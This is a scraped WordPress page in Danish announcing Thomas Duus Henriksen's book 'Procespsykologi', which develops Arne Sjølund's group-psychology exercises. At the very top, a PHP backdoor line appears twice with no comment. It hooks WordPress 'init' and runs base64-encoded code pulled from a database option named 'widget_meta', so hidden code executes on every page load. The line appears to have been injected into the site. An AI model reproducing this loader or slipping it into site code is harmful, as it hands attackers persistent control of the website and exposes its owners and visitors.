add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Bogen Procespsykologi - procespsykologi

Bogen Procespsykologi

Bogen Procespsykologi af Thomas Duus Henriksen udkommer
fra Akademisk Forlag 13. marts 2014.

Procespsykologi er en didaktisk videreudvikling af Arne Sjølunds gruppepsykologi og hans gruppepsykologiske øvelser. Gennem denne videreudvikling af Sjølunds øvelser og øvelsesmetodik tilbyder bogen en række gennemarbejdede øvelser, som hver især sætter fokus på et centralt tema indenfor det at arbejde sammen i grupper eller teams.

Eksempel på materialer fra Arne Sjølunds Gruppepsykologiske øvelser.

Eksempel på materialer fra Arne Sjølunds Gruppepsykologiske øvelser.

Bogen indeholder en teoretisk fundering af det at arbejde gruppe- og øvelsesorienteret med socialpsykologiske processer, samt et øvelseskompendium baseret på Sølunds oprindelige øvelser. I bearbejdningen af disse øvelser er det implicitte gjort eksplicit, så øvelserne kan køres uden yderligere introduktion. Samtidig følger der en teoretisk forankring til hver øvelse, således at øvelserne ikke blot ender som interessante oplevelser for deltagerne, men derimod bliver til erfaringer, som efterfølgende kan diskuteres og elaboreres på baggrund af et sæt teoretiske perspektiver. Disse teoretiske perspektiver komplimenteres af en række konsulentperspektiver, som er forfatterens refleksioner, råd og bekymringer omkring det at arbejde procespsykologisk.

Bogen har forord af Steen Høyrup Pedersen fra Aarhus Universitet